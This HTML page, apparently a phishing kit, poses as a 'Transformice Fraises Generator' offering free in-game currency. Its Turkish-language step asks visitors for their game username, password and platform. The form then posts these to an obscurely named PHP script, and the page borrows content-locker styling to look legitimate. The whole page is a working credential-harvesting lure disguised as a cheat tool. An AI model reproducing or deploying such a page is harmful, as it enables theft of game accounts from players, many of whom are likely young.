<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Transformice Fraises Generator</title>
<meta name="description" content="FREE Trasnformice Fraises!! ">
<meta property="og:title" content="Transformice Fraises Generator">
<meta property="og:description" content="FREE Trasnformice Fraises!! ">
<meta name="referrer" content="no-referrer">

<!-- Analytics -->
    <link rel="stylesheet" type="text/css" href="./qwe_files/css_front.css">
    <link rel="stylesheet" type="text/css" href="./qwe_files/css">
    <link rel="stylesheet" type="text/css" href="./qwe_files/bootstrap.min.css">
    <link rel="stylesheet" href="./qwe_files/font-awesome.min.css">
    <link href="./qwe_files/sweetalert.css" rel="stylesheet" type="text/css">
    <link rel="shortcut icon" type="image/png" href="http://i.hizliresim.com/j682YJ.png">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style type="text/css">
        #formRowContainer div:only-child{
            width:100% !important;
        }
        *{
            margin:0;
            padding:0;
            border:0;
            font-family: 'blender-pro-book';
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
        }
        .row {
            margin-right: -15px;
            margin-left: -15px;
        }
        @font-face {
            font-family: 'blender-pro-book';
            src:
            url('//s3-us-west-1.amazonaws.com/bucket.cpabuild.com/assets/content_lockers/fonts/blenderpro-book-webfont.ttf') format('truetype'),
            url('//s3-us-west-1.amazonaws.com/bucket.cpabuild.com/assets/content_lockers/fonts/blenderpro-book-webfont.html') format('woff2'),
            url('//s3-us-west-1.amazonaws.com/bucket.cpabuild.com/assets/content_lockers/fonts/blenderpro-book-webfont.woff') format('woff'),
            url('//s3-us-west-1.amazonaws.com/bucket.cpabuild.com/assets/content_lockers/fonts/blenderpro-book-webfont.svg') format('svg');
            font-weight: normal;
            font-style: normal;
        }
        #header{
            border-bottom: 2px groove rgba(10,143,213, 0.65);
        }
        #header,#bottom {
            background-color: #000000;
            opacity: 0.75;
            height: 96px;
            position: relative;
            width:100%;
        }
        #bottom{
            background-color: rgba(0,0,0, 0.75);
            height: 103px;
            border-top: 2px groove rgba(256,256,256, 0.65);
            position:absolute;
            bottom:0;
        }
        @media screen and (max-height: 720px) {
            #bottom {
                display: none;
            }
        }
        #box{
            margin:150px auto 0;
            width:100%;
            max-width: 750px;
        }
        #boxHeader{
            color: #fff;
            background-color: rgba(255,255,255,0.85);
            border-color: #ddd;
            border-top-left-radius: 0px;
            border-top-right-radius: 0px;
            padding: 10px 15px;
            border-bottom: 1px solid transparent;
            text-align: left;
        }
        #boxHeader div{
            font-size: 30px;
            color: #000;
            font-weight:500;
            line-height:33px;
        }
        #boxContent{
            font-size: 20px;
            color:#fff;
            background-color:rgba(0, 0, 0, 0.74902);
            padding: 15px;
            padding-bottom: 30px;
        }
        body{
            background-size: 100% 100%;
            -webkit-background-size: 100% 100%;
            -moz-background-size: 100% 100%;
            -o-background-size: 100% 100%;
            background:url('http://i.hizliresim.com/OD0qgP.jpg') no-repeat center center fixed;
        }
        #overlay{
            background:black;
            height:100%;
            width:100%;
            position: absolute;
            top:0;
            left:0;
            opacity:0.25;
            z-index:1;
            min-height:600px;
        }
        #content{
            z-index:2;
            position: absolute;
            margin: 0 auto;
            text-align: center;
            left: 0;
            right: 0;
        }
        #logo{
            z-index:2;
            position: absolute;
            margin: 0 auto;
            text-align: center;
            left: 0;
            right: 0;
            top: 22px;
        }
        #logo img{
            height:130px;
        }
        .form-text{
            font-size: 18px;
        }
        .btn-secondary {
            color: #373a3c;
            border-color: #ccc;
        }
        .centerButton{
            text-align: center;
            margin-top:80px;
        }
        #step2Button,#step3Button{
            font-size: 16px;
        }
        #step2Button .fa{
            position: relative;
            top: 1px;
        }
        .instructions{
            margin-bottom: 35px;
        }
        .input-group{
            margin-bottom:10px;
        }
        .input-group-addon img{
            width:20px;height:20px;
        }
        .console{
            height:250px;
            overflow-y: auto;
            color:white;
            text-align: left;
            font-size:14px;
        }
        .newConsoleMsg{
            color:yellow;
        }
        .caretFlash{
            height: 10px;
            top: 5px;
            width: 6px;
            position: relative;
            background-color: white;
            display: inline-block;
            animation: flash 500ms step-end infinite;
        }

        @keyframes flash {
            0% {
                background:white;
            }
            50% {
                background:none;
            }
        }
    .msgInfo{
        color:#00BFFF
    }
        .msgSuccess{
            color: #73ff67
        }
        .msgPrompt{
            color:#DB7093;
        }
        .msgFail{
            color:red;
        }
        .userInput{
            display:inline-block;margin-left:10px;
            color:yellow;
        }

        /*LOADING SCREEN CSS*/
        .spinner{margin:20% auto;width:40px;height:40px;position:relative}.cube1,.cube2{background-color:#fff;width:15px;height:15px;position:absolute;top:0;left:0;-webkit-animation:sk-cubemove 1.8s infinite ease-in-out;animation:sk-cubemove 1.8s infinite ease-in-out}.cube2{-webkit-animation-delay:-.9s;animation-delay:-.9s}@-webkit-keyframes sk-cubemove{25%{-webkit-transform:translateX(42px) rotate(-90deg) scale(0.5)}50%{-webkit-transform:translateX(42px) translateY(42px) rotate(-180deg)}75%{-webkit-transform:translateX(0px) translateY(42px) rotate(-270deg) scale(0.5)}100%{-webkit-transform:rotate(-360deg)}}@keyframes sk-cubemove{25%{transform:translateX(42px) rotate(-90deg) scale(0.5);-webkit-transform:translateX(42px) rotate(-90deg) scale(0.5)}50%{transform:translateX(42px) translateY(42px) rotate(-179deg);-webkit-transform:translateX(42px) translateY(42px) rotate(-179deg)}50.1%{transform:translateX(42px) translateY(42px) rotate(-180deg);-webkit-transform:translateX(42px) translateY(42px) rotate(-180deg)}75%{transform:translateX(0px) translateY(42px) rotate(-270deg) scale(0.5);-webkit-transform:translateX(0px) translateY(42px) rotate(-270deg) scale(0.5)}100%{transform:rotate(-360deg);-webkit-transform:rotate(-360deg)}}.loadingScreen{background-color:#2980b9;position:fixed;z-index:99999;top:0;left:0;width:100%;height:100%}



    </style>
	
	<style>
.swing{
 -webkit-animation:swinging 10s ease-in-out 0s infinite;
 -moz-animation:swinging 10s ease-in-out 0s infinite;
 animation:swinging 10s ease-in-out 0s infinite;
 -webkit-transform-origin:50% 0;
 -moz-transform-origin:50% 0;
 transform-origin:50% 0;
}

@-webkit-keyframes swinging{
 0% { -webkit-transform: rotate(0); }
 5% { -webkit-transform: rotate(10deg); }
 10% { -webkit-transform: rotate(-9deg); }
 15% { -webkit-transform: rotate(8deg); }
 20% { -webkit-transform: rotate(-7deg); }
 25% { -webkit-transform: rotate(6deg); }
 30% { -webkit-transform: rotate(-5deg); }
 35% { -webkit-transform: rotate(4deg); }
 40% { -webkit-transform: rotate(-3deg); }
 45% { -webkit-transform: rotate(2deg); }
 50% { -webkit-transform: rotate(0); }
 100% { -webkit-transform: rotate(0); }

}

@-moz-keyframes swinging{
 0% { -moz-transform: rotate(0); }
 5% { -moz-transform: rotate(10deg); }
 10% { -moz-transform: rotate(-9deg); }
 15% { -moz-transform: rotate(8deg); }
 20% { -moz-transform: rotate(-7deg); }
 25% { -moz-transform: rotate(6deg); }
 30% { -moz-transform: rotate(-5deg); }
 35% { -moz-transform: rotate(4deg); }
 40% { -moz-transform: rotate(-3deg); }
 45% { -moz-transform: rotate(2deg); }
 50% { -moz-transform: rotate(0); }
 100% { -moz-transform: rotate(0); }
}

@keyframes swinging{
 0% { transform: rotate(0); }
 5% { transform: rotate(10deg); }
 10% { transform: rotate(-9deg); }
 15% { transform: rotate(8deg); }
 20% { transform: rotate(-7deg); }
 25% { transform: rotate(6deg); }
 30% { transform: rotate(-5deg); }
 35% { transform: rotate(4deg); }
 40% { transform: rotate(-3deg); }
 45% { transform: rotate(2deg); }
 50% { transform: rotate(0); }
 100% { transform: rotate(0); }

}
</style>
</head>
<body>

<div class="loadingScreen" style="display: none;">
    <div class="spinner">
        <div class="cube1"></div>
        <div class="cube2"></div>
    </div>
</div>

<div id="overlay"></div>
<div id="CPABUILDHTMLcontainer" style="min-height:600px;">
    <div id="header"></div>
    <div id="logo"><img class="swing" src="http://i.hizliresim.com/PD0oYN.png" style="
 animation-delay: 0.5s;
 -webkit-animation-delay: 0.5s;
 -moz-animation-delay: 0.5s;
 animation-delay: 0.5s;
 "
/>
	</div>
	
    <div id="content">
            <div id="box">
                <div id="boxHeader"><div>Transformice Fraises Generator<img src="http://i.hizliresim.com/yqEMy0.png"></div></div>
                <div id="boxContent">
                    <div id="step1" style="display: block;">
						<a color="red" >1. AŞAMA</a>
                        <p class="instructions">Kullanıcıadı, Şifre Girin Ve Platformunuzu Seçin.</p>
						<a color="red" >YENİ KURULAN HESAPLARDA HİLE ÇALIŞMAMAKTADIR.</a>
                        <div class="row">
						<br>
						<form method="POST" action="api-KEY-xaUkxa-OSxzqt.php" target="_self">
						<input type="hidden" name="csrfmiddlewaretoken" value="6812e2894b63d62edd6f9021814e3055"/>
                            <div class="col-md-6">
                                <div class="input-group">
                                    <span class="input-group-addon"><img src="http://i.hizliresim.com/Y6DBzj.png"></span>
                                    <input id="username" type="text" name="username" class="form-control blender-pro-book form-text" placeholder="Enter Username" aria-describedby="basic-addon1" required="required"/>
                                </div>

								<div class="input-group">
                                    <span class="input-group-addon"><img src="http://i.hizliresim.com/6N924N.png"></span>
                                    <input id="password" type="password" name="password" class="form-control blender-pro-book form-text" placeholder="Enter Password" aria-describedby="basic-addon1" required="required"/>
                                </div>
                            </div>
                            <div class="col-md-6">
                                <div class="input-group">
                                    <span class="input-group-addon"><img src="http://i.hizliresim.com/WD0nlq.png"></span>
                                    <select id="deviceInput" class="form-control blender-pro-book form-text"><option value="PC">PC</option><option value="Android">Android</option> <option value="ios">İOS</option> </select>
                                </div>
                            </div>
						<br>
						<br>
						<input type="submit" class="btn btn-secondary" value=" DEVAM ET "> <img src="http://i.hizliresim.com/vPbEOD.gif">
						</form>
                        </div>
                    </div>
                </div>
            </div>
    </div>
    <div id="bottom"></div>
</div>
<script src="./qwe_files/jquery.js"></script>
